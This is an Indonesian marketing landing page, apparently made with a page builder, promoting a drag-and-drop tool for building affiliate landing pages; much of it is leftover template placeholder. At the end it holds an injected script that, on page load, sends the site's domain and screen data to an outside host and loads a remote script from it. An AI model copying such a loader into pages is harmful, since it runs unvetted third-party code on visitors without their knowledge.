<!DOCTYPE html>
<html><head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    
   

    <title></title>
<meta name="description" content="">
<meta name="keywords" content="">

    <!-- Loading Bootstrap -->
    <link href="css/build.css" rel="stylesheet">

    <!-- HTML5 shim, for IE6-8 support of HTML5 elements. All other JS at the end of file. -->
    <!--[if lt IE 9]>
      <script src="js/html5shiv.js"></script>
      <script src="js/respond.min.js"></script>
    <![endif]-->

    

    
<style type="text/css"></style></head>
<body>
    
    <div id="page" class="page">
        
    <section style="outline: none; cursor: inherit; background: url(&quot;http://ubuilder.co/build/elements/images/coffeeshop.jpg&quot;) 0% 0% / cover;">
                <div class="container-fluid" style="background:rgba(0,0,0,0.5);">
                    <div class="row">
                       <div class="col-md-12" style="text-align:center;margin:30px 0;">
                          <img src="http://ubuilder.co/build/elements/images/logo.png" class="img-responsive center-block" style="width: 150px; outline: none; cursor: inherit;">
                          <h1 style="font-size: 80px; color: rgb(255, 255, 255); outline: none; cursor: inherit; text-align: center; border-color: rgb(255, 255, 255); border-style: none; background-color: rgba(0, 0, 0, 0);"><b>Bang Huget</b></h1>
                          <p style="font-size: 24px; color: rgb(255, 255, 255); font-weight: 100; outline: none; cursor: inherit;">Jadilah yang pertama menjadi member balauka</p>
                          <div class="btn" style="border:2px #fff solid;color:#fff;margin-top:30px;">
                            <p style="margin: 0px; font-size: 21px; outline: none; cursor: inherit;"><span class="fa fa-send" style="outline: none; cursor: inherit;"></span> Register</p>
                          </div>
                       </div>
                    </div>
                </div>
            </section><section style="padding-top: 0px; padding-bottom: 0px; position: static; border: 0px none rgb(52, 73, 94); outline: none; cursor: inherit; background-image: none; background-color: rgb(248, 248, 248); background-size: auto; background-repeat: repeat;">
 <div class="container" style="outline: none; cursor: inherit;">
  <div class="row" style="outline: none; cursor: inherit;">
<div class="col-md-12" style="outline: none; cursor: inherit;">
 <h2 style="outline: none; cursor: inherit;"></h2><h2 class="" style="margin-right: 0px; margin-left: 0px; padding: 0px; border: 0px; font-size: 50px; vertical-align: baseline; clear: both; line-height: 1.5em; text-align: center; font-family: Lato, sans-serif; color: rgb(17, 137, 198); font-weight: 400; margin-top: 30px !important; margin-bottom: 50px !important; outline: none; cursor: inherit; background-color: rgb(248, 248, 248);"></h2><h2 class="" style="outline: none; margin-right: 0px; margin-left: 0px; padding: 0px; border: 0px; font-size: 50px; vertical-align: baseline; clear: both; line-height: 1.5em; text-align: center; font-family: Lato, sans-serif; color: rgb(44, 62, 80); font-weight: 400; margin-top: 80px !important; margin-bottom: 70px !important; cursor: inherit; background-color: rgb(248, 248, 248);">uBuilder bisa&nbsp;<span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;"><span class="italic_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-style: italic; color: inherit;"><font color="#151515" style="outline: none;">Membantu Siapapun!</font></span></span></h2>
 <p style="outline: none; cursor: inherit;"></p><p style="font-size: 22px; margin-bottom: 20px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); outline: none; cursor: inherit; background-color: rgb(248, 248, 248);"></p><p style="outline: none; font-size: 22px; margin-bottom: 20px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); cursor: inherit; background-color: rgb(248, 248, 248);">Di era yang seba digital ini, website adalah&nbsp;<span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;">kebutuhan paling primer</span>&nbsp;untuk semua pelaku bisnis online dan offline.</p><p style="outline: none; font-size: 22px; margin-bottom: 20px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); cursor: inherit; background-color: rgb(248, 248, 248);">Kita akan&nbsp;<span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;">kehilangan kepercayaan</span>, jika berbisnis toko online, tetapi tidak memiliki website. Para pelaku UKM juga bakal&nbsp;<span class="underline_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; text-decoration: underline; color: inherit;"><span class="italic_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-style: italic; color: inherit;">tertinggal jauh dengan kompetitor</span></span>&nbsp;tanpa memiliki website.</p><p style="outline: none; font-size: 22px; margin-bottom: 20px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); cursor: inherit; background-color: rgb(248, 248, 248);">Sementara pelaku affiliate marketing wajib memiliki&nbsp;<span class="italic_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-style: italic; color: inherit;">landing page</span>&nbsp;untuk setiap offernya. Di sini, kita semua percaya,&nbsp;<span class="italic_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-style: italic; color: inherit;">landing page</span>&nbsp;memiliki pengaruh besar dalam urusan menaikkan konversi penjualan.</p><p style="outline: none; cursor: inherit;"></p><p style="font-size: 22px; margin-bottom: 20px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); outline: none; cursor: inherit; background-color: rgb(248, 248, 248);"></p><p style="font-size: 22px; margin-bottom: 20px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); outline: none; cursor: inherit; background-color: rgb(248, 248, 248);"></p><p style="font-size: 22px; margin-bottom: 20px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); outline: none; cursor: inherit; background-color: rgb(248, 248, 248);"></p><div class="thrv_contentbox_shortcode" style="margin: 20px 0px; padding: 1px; border: 0px; font-size: 14px; vertical-align: baseline; box-sizing: content-box; position: relative; color: rgb(51, 51, 51); font-family: Lato, sans-serif; line-height: normal; outline: none; cursor: inherit; background-color: rgb(248, 248, 248);"><div class="" style="margin-right: 0px; margin-left: 0px; padding: 0px; border: 1px solid rgb(223, 127, 0); vertical-align: baseline; box-sizing: content-box; width: auto; box-shadow: none; margin-top: 30px !important; margin-bottom: 30px !important; outline: none; cursor: inherit; background: rgb(255, 236, 211);"><div class="_cnt" style="margin: 0px; padding: 20px 40px; border: 0px; vertical-align: baseline; box-sizing: content-box; outline: none; cursor: inherit;"><p style="font-size: 22px; margin-bottom: 0px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; outline: none; cursor: inherit;">Para&nbsp;<span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;">top marketer dunia selalu menggunakan website</span>&nbsp;/&nbsp;<span class="italic_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-style: italic; color: inherit;">landing page</span>&nbsp;khusus untuk menaikkan konversi penjualan setiap offernya. Dalam seminggu, mereka&nbsp;<span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;">bisa membuat 3 hingga 5&nbsp;</span><span class="italic_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-style: italic; color: inherit;"><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;">landing page</span></span><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;">.</span></p></div></div></div><p style="font-size: 22px; margin-bottom: 30px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); outline: none; cursor: inherit; background-color: rgb(248, 248, 248);">Baik, lihat bagaimana saya mendapatkan hasil yang maksimal saat menjadi affiliate dengan menggunakan landing page yang sesuai dengan&nbsp;<i style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline;">offer&nbsp;</i>produk yang saya tawarkan.</p><p style="font-size: 22px; margin-bottom: 20px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); outline: none; cursor: inherit; background-color: rgb(248, 248, 248);">
</p>

<p style="outline: none; cursor: inherit;"></p>
</div>
  </div>
 </div>
</section><section style="color: white; padding: 50px 0px 10px; position: static; border: 0px none rgb(255, 255, 255); outline: none; cursor: inherit; background: none 0% 0% / auto repeat rgb(248, 248, 248);">
<div class="container" style="outline: none; cursor: inherit;">
 <div class="row" style="outline: none; cursor: inherit;">
  <div class="col-md-8 col-md-offset-2" style="outline: none; cursor: inherit;">
  <h1 style="text-align: center; font-size: 38px; margin-top: 0px; margin-bottom: 30px; outline: none; cursor: inherit;"></h1>
<img src="http://graphicspresident.com/wp-content/uploads/2016/06/proof.jpg" class="img-responsive center-block" style="outline: none; cursor: inherit;">
  </div>
 </div>
</div>
  </section><section style="padding-top: 0px; padding-bottom: 0px; position: static; border: 0px none rgb(52, 73, 94); outline: none; cursor: inherit; background-image: none; background-color: rgb(248, 248, 248); background-size: auto; background-repeat: repeat;">
 <div class="container" style="outline: none; cursor: inherit;">
  <div class="row" style="outline: none; cursor: inherit;">
<div class="col-md-12" style="outline: none; cursor: inherit;">
 <p style="outline: none; cursor: inherit;"><span style="color: rgb(51, 51, 51); font-family: &quot;Gentium Basic&quot;, serif; font-size: 22px; line-height: 35.992px; background-color: rgb(248, 248, 248);">Sederhananya, membuat website / minisite yang menyesuiakan produk atau tema tertentu memiliki konversi penjualan yang bagus.</span></p>
</div>
  </div>
 </div>
</section><section style="padding-top: 0px; padding-bottom: 0px; position: static; border: 0px none rgb(52, 73, 94); outline: none; cursor: inherit; background-image: none; background-color: rgb(248, 248, 248); background-size: auto; background-repeat: repeat;">
 <div class="container" style="outline: none; cursor: inherit;">
  <div class="row" style="outline: none; cursor: inherit;">
<div class="col-md-12" style="text-align: center; outline: none; cursor: inherit;">
 <h2 class="" style="margin-right: 0px; margin-left: 0px; padding: 0px; border: 0px; font-size: 35px; vertical-align: baseline; clear: both; line-height: 1.5em; text-align: center; font-family: Lato, sans-serif; color: rgb(17, 137, 198); font-weight: 400; margin-top: 50px !important; margin-bottom: 50px !important; outline: none; cursor: inherit; background-color: rgb(248, 248, 248);"><i>Jika Kamu Setuju Membuat Website itu Penting, Artinya Pemikiranmu Sudah 1 Level dengan Para Top Marketer Lainnya

</i></h2><p style="font-size: 22px; margin-bottom: 30px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); outline: none; cursor: inherit; background-color: rgb(248, 248, 248);"><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;"></span>Sekarang&nbsp;<span class="italic_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-style: italic; color: inherit;"><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;"></span><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;"></span></span><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;">bayangkan jika kamu harus membuat website yang banyak</span><span class="italic_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-style: italic; color: inherit;"><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;">&nbsp;</span><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;"></span></span>dengan harga yang mahal, seperti ini:</p><p style="outline: none; cursor: inherit;"></p>
</div>
  </div>
 </div>
</section><section style="color: white; padding: 50px 0px; position: static; border: 0px none rgb(255, 255, 255); outline: none; cursor: inherit; background: none 0% 0% / auto repeat rgb(248, 248, 248);">
<div class="container" style="outline: none; cursor: inherit;">
 <div class="row" style="outline: none; cursor: inherit;">
  <div class="col-md-8 col-md-offset-2" style="text-align: center; outline: none; cursor: inherit;">
 <img src="http://graphicspresident.com/wp-content/uploads/2016/06/komp.jpg" class="img-responsive center-block" style="width: 700px; border-radius: 0px; border: 1px none rgb(255, 255, 255); margin: 0px auto; outline: none; cursor: inherit;">
  </div>
 </div>
</div>
  </section><section style="padding-top: 0px; padding-bottom: 0px; position: static; border: 0px none rgb(52, 73, 94); outline: none; cursor: inherit; background-image: none; background-color: rgb(248, 248, 248); background-size: auto; background-repeat: repeat;">
 <div class="container" style="outline: none; cursor: inherit;">
  <div class="row" style="outline: none; cursor: inherit;">
<div class="col-md-12" style="outline: none; cursor: inherit;">
 <p style="outline: none; cursor: inherit;"></p><p style="font-size: 22px; margin-bottom: 30px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); outline: none; cursor: inherit; background-color: rgb(248, 248, 248);">Oke, mungkin buat sebagian orang, ini tidak masalah. Tetapi, bagi sebagian besar orang, saya yakin ini juga bakal menjadi kendala.<span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;"></span></p><p style="font-size: 22px; margin-bottom: 30px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); outline: none; cursor: inherit; background-color: rgb(248, 248, 248);"><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;"></span>Nah, oleh karena itu, saya bersama partner saya, Nuga, sudah&nbsp;<span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;">membuat alternatif.</span><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;"></span></p><p style="font-size: 22px; margin-bottom: 30px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); outline: none; cursor: inherit; background-color: rgb(248, 248, 248);"><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;"></span>Sebuah&nbsp;<span class="italic_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-style: italic; color: inherit;">web based app</span>&nbsp;yang bakal membantu kamu untuk membuat website / minisite, HTML,&nbsp;<span class="underline_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; text-decoration: underline; color: inherit;"><span class="italic_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-style: italic; color: inherit;">dengan amat sangat mudah.</span></span>&nbsp;Yang perlu kamu lakukan adalah, tinggal&nbsp;<span class="italic_text" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-style: italic; color: inherit;"><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;">drag and drop, edit, export!</span></span>&nbsp;Selesai!<span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;"></span></p><p style="font-size: 22px; margin-bottom: 30px; padding: 0px; border: 0px; vertical-align: baseline; line-height: 1.636em; font-family: &quot;Gentium Basic&quot;, serif; color: rgb(51, 51, 51); outline: none; cursor: inherit; background-color: rgb(248, 248, 248);"><span class="" style="outline: none; margin: 0px; padding: 0px; border: 0px; vertical-align: baseline; font-weight: bold; color: inherit;"></span>Memperkenalkan, sebuah produk terbaru yang kita buid dengan sepenuh hati:</p><p style="outline: none; cursor: inherit;"></p>
</div>
  </div>
 </div>
</section><div class="item team" id="team1">
    		
    		<div class="container">
    		
    			<div class="row margin-bottom-40">
    			
    				<div class="col-md-12">
    				
    					<p class="lead text-center editContent" style="outline: none; cursor: inherit;">
    						We're awesome - get to know us better!
    					</p>
    				
    				</div><!-- /.col-md-12 -->
    			
    			</div><!-- /.row -->
    		    		
    			<div class="row margin-bottom-20 text-center">
    			
    				<div class="col-md-3">
    				   
    				   	<img src="http://ubuilder.co/build/elements/images/team1.jpg" class="img-rounded teamImage" alt="" style="outline: none; cursor: inherit;">
    				   	
    				   	<div class="editContent" style="outline: none; cursor: inherit;">
    				   	<h4 style="outline: none; cursor: inherit;">Mattijs Naus</h4>
    				   	
    				   	<p style="outline: none; cursor: inherit;">
    				   		Web developer, designer, lover of cigars and fine whisky
    				   	</p>
    				   	</div><!-- /.editContent -->
    				   	
    				   	<p class="social" style="outline: none; cursor: inherit;">
    				   		<a href="" class="propClone" style="outline: none; cursor: inherit;"><span class="fa fa-facebook-square" style="outline: none; cursor: inherit;"></span></a>&nbsp;&nbsp;
    				   		<a href="" class="propClone" style="outline: none; cursor: inherit;"><span class="fa fa-twitter-square" style="outline: none; cursor: inherit;"></span></a>&nbsp;&nbsp;
    				   		<a href="" class="propClone" style="outline: none; cursor: inherit;"><span class="fa fa-linkedin-square" style="outline: none; cursor: inherit;"></span></a>&nbsp;&nbsp;
    				   		<a href="" class="propClone" style="outline: none; cursor: inherit;"><span class="fa fa-google-plus-square" style="outline: none; cursor: inherit;"></span></a>
    				   	</p>
    						    					    				
    				</div><!-- /.col-md-3 col -->
    				
    				<div class="col-md-3">
    				   
    				   	<img src="http://ubuilder.co/build/elements/images/team1.jpg" class="img-rounded teamImage" alt="" style="outline: none; cursor: inherit;">
    				   	
    				   	<div class="editContent" style="outline: none; cursor: inherit;">
    				   	<h4 style="outline: none; cursor: inherit;">Mattijs Naus</h4>
    				   	
    				   	<p style="outline: none; cursor: inherit;">
    				   		Web developer, designer, lover of cigars and fine whisky
    				   	</p>
    				   	</div><!-- /.editContent -->
    				   	
    				   	<p class="social" style="outline: none; cursor: inherit;">
    				   		<a href="" style="outline: none; cursor: inherit;"><span class="fa fa-facebook-square" style="outline: none; cursor: inherit;"></span></a>&nbsp;&nbsp;
    				   		<a href="" style="outline: none; cursor: inherit;"><span class="fa fa-twitter-square" style="outline: none; cursor: inherit;"></span></a>&nbsp;&nbsp;
    				   		<a href="" style="outline: none; cursor: inherit;"><span class="fa fa-linkedin-square" style="outline: none; cursor: inherit;"></span></a>&nbsp;&nbsp;
    				   		<a href="" style="outline: none; cursor: inherit;"><span class="fa fa-google-plus-square" style="outline: none; cursor: inherit;"></span></a>
    				   	</p>
    						    					    				
    				</div><!-- /.col-md-3 col -->
    				
    				<div class="col-md-3">
    				   
    				   	<img src="http://ubuilder.co/build/elements/images/team1.jpg" class="img-rounded teamImage" alt="" style="outline: none; cursor: inherit;">
    				   	
    				   	<div class="editContent" style="outline: none; cursor: inherit;">
    				   	<h4 style="outline: none; cursor: inherit;">Mattijs Naus</h4>
    				   	
    				   	<p style="outline: none; cursor: inherit;">
    				   		Web developer, designer, lover of cigars and fine whisky
    				   	</p>
    				   	</div><!-- /.editContent -->
    				   	
    				   	<p class="social" style="outline: none; cursor: inherit;">
    				   		<a href="" style="outline: none; cursor: inherit;"><span class="fa fa-facebook-square" style="outline: none; cursor: inherit;"></span></a>&nbsp;&nbsp;
    				   		<a href="" style="outline: none; cursor: inherit;"><span class="fa fa-twitter-square" style="outline: none; cursor: inherit;"></span></a>&nbsp;&nbsp;
    				   		<a href="" style="outline: none; cursor: inherit;"><span class="fa fa-linkedin-square" style="outline: none; cursor: inherit;"></span></a>&nbsp;&nbsp;
    				   		<a href="" style="outline: none; cursor: inherit;"><span class="fa fa-google-plus-square" style="outline: none; cursor: inherit;"></span></a>
    				   	</p>
    						    					    				
    				</div><!-- /.col-md-3 col -->
    				
    				<div class="col-md-3">
    				   
    				   	<img src="http://ubuilder.co/build/elements/images/team1.jpg" class="img-rounded teamImage" alt="" style="outline: none; cursor: inherit;">
    				   	
    				   	<div class="editContent" style="outline: none; cursor: inherit;">
    				   	<h4 style="outline: none; cursor: inherit;">Mattijs Naus</h4>
    				   	
    				   	<p style="outline: none; cursor: inherit;">
    				   		Web developer, designer, lover of cigars and fine whisky
    				   	</p>
    				   	</div><!-- /.editContent -->
    				   	
    				   	<p class="social" style="outline: none; cursor: inherit;">
    				   		<a href="" style="outline: none; cursor: inherit;"><span class="fa fa-facebook-square" style="outline: none; cursor: inherit;"></span></a>&nbsp;&nbsp;
    				   		<a href="" style="outline: none; cursor: inherit;"><span class="fa fa-twitter-square" style="outline: none; cursor: inherit;"></span></a>&nbsp;&nbsp;
    				   		<a href="" style="outline: none; cursor: inherit;"><span class="fa fa-linkedin-square" style="outline: none; cursor: inherit;"></span></a>&nbsp;&nbsp;
    				   		<a href="" style="outline: none; cursor: inherit;"><span class="fa fa-google-plus-square" style="outline: none; cursor: inherit;"></span></a>
    				   	</p>
    						    					    				
    				</div><!-- /.col-md-3 col -->
    			
    			</div><!-- /.row -->
    			
    		</div><!-- /.container -->
    	
    	</div><!-- /.item --><section style="padding: 30px 0px; outline: none; cursor: inherit;">
                <div class="container">
                    <div class="row">
                        <div class="col-md-2 col-md-offset-1">
                            <img src="http://graphicspresident.com/wp-content/plugins/thrive-visual-editor/landing-page/templates/css/images/shanemelaugh2.jpg" class="img-responsive center-block img-circle" style="border: 1px solid rgb(234, 234, 234); outline: none; cursor: inherit;">
                        </div>
                        <!-- /.col-md-2 -->
                        <div class="col-md-8">
                            <div class="testimonial" style="border:1px #eaeaea solid;padding:30px;">
                                <h3 style="font-size: 30px; margin-top: 0px; outline: none; cursor: inherit;">“Testimonial Heading Lorem”</h3>

                                <p style="font-style: italic; font-size: 20px; outline: none; cursor: inherit;">“Here, we have a second testimonials section, right after the purchase section. Now that we've asked the reader to pull the trigger, they might feel some resistance and testimonials can help reassure them.”

                                We like to do what many others have done already. There's safety in numbers. Testimonials can be used to give your visitor that sense of safety."</p>

                                <p style="font-weight: bold; font-size: 20px; outline: none; cursor: inherit;">Shane Melaugh</p>
                                <p style="font-size: 18px; outline: none; cursor: inherit;">- Job Title or Role</p>
                            </div>
                        </div>
                        <!-- /.col-md-8 -->
                    </div>
                </div>
            </section><section style="padding: 30px 0px; outline: none; cursor: inherit;">
                <div class="container">
                    <div class="row">
                        <div class="col-md-8 col-md-offset-1">
                            <div class="testimonial" style="border:1px #eaeaea solid;padding:30px;">
                                <h3 style="font-size: 30px; margin-top: 0px; outline: none; cursor: inherit;">“Testimonial Heading Lorem”</h3>

                                <p style="font-style: italic; font-size: 20px; outline: none; cursor: inherit;">“Here, we have a second testimonials section, right after the purchase section. Now that we've asked the reader to pull the trigger, they might feel some resistance and testimonials can help reassure them.”

                                We like to do what many others have done already. There's safety in numbers. Testimonials can be used to give your visitor that sense of safety."</p>

                                <p style="font-weight: bold; font-size: 20px; outline: none; cursor: inherit;">Shane Melaugh</p>
                                <p style="font-size: 18px; outline: none; cursor: inherit;">- Job Title or Role</p>
                            </div>
                        </div>
                        <!-- /.col-md-8 -->
                        <div class="col-md-2">
                            <img src="http://graphicspresident.com/wp-content/plugins/thrive-visual-editor/landing-page/templates/css/images/shanemelaugh2.jpg" class="img-responsive center-block img-circle" style="border: 1px solid rgb(234, 234, 234); outline: none; cursor: inherit;">
                        </div>
                        <!-- /.col-md-2 -->
                    </div>
                </div>
            </section><section class="item contact" style="outline: none; cursor: inherit;">
                
            <div class="container">
            
                <div class="col-md-4 col-md-offset-2">
                
                    <h4 style="outline: none; cursor: inherit;">Say what?</h4>
                    
                    <p style="outline: none; cursor: inherit;">
                        We have a weak spot for static HTML sites and truly believe they often are the better choice compared to CMS sites. That said, dealing with forms on those static sites is often a pain, and with Sent we're hoping to make life a bit easier.
                    </p>
                        
                    <p class="small" style="outline: none; cursor: inherit;">
                        Sent is built and maintained by <a href="#" style="outline: none; cursor: inherit;">Ubuilder</a>.
                    </p>
                
                </div><!-- ./col-md-4 -->
                
                <div class="col-md-4 col-offset-2">
                
                    <h4 style="outline: none; cursor: inherit;">Get in touch</h4>
                
                    <form role="form" style="outline: none; cursor: inherit;">
                    
                        <div class="form-group">
                            <input type="text" class="form-control input-lg" id="name" name="name" placeholder="Your name *" style="outline: none; cursor: inherit;">
                        </div>
                                                
                        <div class="form-group">
                            <input type="email" class="form-control input-lg" id="email" name="email" placeholder="Your email *" style="outline: none; cursor: inherit;">
                        </div>
                        
                        <div class="form-group">
                            <textarea class="form-control" rows="4" placeholder="Add comment..."></textarea>
                        </div>
                                            
                        <button type="submit" class="btn btn-primary btn-embossed btn-lg btn-wide" style="outline: none; cursor: inherit;"><span class="fui-mail"></span> Submit</button>
                    
                    </form>
                
                </div><!-- /.col-md-4 -->
            
            </div><!-- /.container -->
                    
        </section><!-- /.item --><section style="padding: 20px 0px; outline: none; cursor: inherit; background: url(&quot;http://ubuilder.co/build/elements/images/introfivebg.jpg&quot;) 0% 0% / cover;">
            <div class="container"> 
                <div class="row">
                    <div class="col-md-8 col-md-offset-2">
                        <div style="text-align:center;">
                        <img class="logo" src="http://ubuilder.co/build/elements/images/logo.png" style="width: 150px; outline: none; cursor: inherit;" alt="">
                        </div>
                        <p style="text-align: center; font-size: 18px; font-weight: 100; margin-top: 20px; outline: none; cursor: inherit;">Lorem ipsum dolor sit amet, consectetur adipiscing elit. Quisque leo nisi, finibus finibus orci in, imperdiet luctus odio. Nunc fermentum accumsan quam eget consequat.</p>
                        <ul class="ulinline2" style="margin: 0px; padding: 0px; list-style: none; text-align: center; outline: none; cursor: inherit;" data-selector="ul">
                            <li><a href="#" target="_blank" style="outline: none; cursor: inherit;"><i class="fa fa-twitter"></i></a></li>
                            <li><a href="#" target="_blank" style="outline: none; cursor: inherit;"><i class="fa fa-facebook"></i></a></li>
                            <li><a href="#" target="_blank" style="outline: none; cursor: inherit;"><i class="fa fa-instagram"></i></a></li>
                            <li><a href="#" target="_blank" style="outline: none; cursor: inherit;"><i class="fa fa-linkedin"></i></a></li>
                            <li><a href="#" target="_blank" style="outline: none; cursor: inherit;"><i class="fa fa-google"></i></a></li>
                            <li><a href="#" target="_blank" style="outline: none; cursor: inherit;"><i class="fa fa-dribbble"></i></a></li>
                            <li><a href="#" target="_blank" style="outline: none; cursor: inherit;"><i class="fa fa-behance"></i></a></li>
                            <li><a href="#" target="_blank" style="outline: none; cursor: inherit;"><i class="fa fa-pinterest"></i></a></li>
                        </ul>
                    </div>
                </div>
            </div>
        </section></div><!-- /#page -->
	
	<!-- Load JS here for greater good =============================-->
    <script src="js/build.min.js"></script>
    <script src="http://cdnjs.cloudflare.com/ajax/libs/waypoints/2.0.3/waypoints.min.js"></script>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582ECSaLdwqSpnkyjwYFLwi%2b%2bt7EXLlJt7TQ8oyKDICsX2MBn%2f8IJeF6rB%2fwQiChi9j4vGI3kwtXpktK7NJaOJUbAwfY5RQUw6ZH9T8ARU2gvFen%2fBuWLexZbjGliH1Ug3TOdzuUIULNfBg%2bNtGyZsOG550u%2bf%2fwpEY8p4PhlNPa0bOyLkNQqJKCAPB7V5dMvZn9FxmkkJQ4%2fBvQscWohVnZn6GX5cYtIVRpNlUQiW4aKX290uFjyWV4%2fclya92mhF6eiYx77WQzdKvQ3VMxizIfkNPevMtfzyK7CMjv0xrto6NukY6sTEHz05V34%2bxxIKeJuyQH5p8vrMzCasfEsnBsa5aENacx9rxUNiYx1B8OEJVPXAwHMpt0lhnUDuvQsg6%2b36oNN7LDLR2ik8f0wD2snxsEBM6JYqWTLAYdT1%2fXRmH%2bHbB7IYxHDkx1hzy6Z7Yi89vM0wx66gcGLaCebKj3cp5YKOcuGUALOlwB8wA2qvcvG6u%2fp%2fIArQO21bZc6RLmp5Brh%2bucVIEHNndbjtvQholFp79mT8naq18KGpeYfH4ceQlKe%2fI%2fd%2f6iK3hHi0s4CdLRqY6ResiDrEe6gVkPiJDNyd1eF9zw%3d%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script>

</body></html>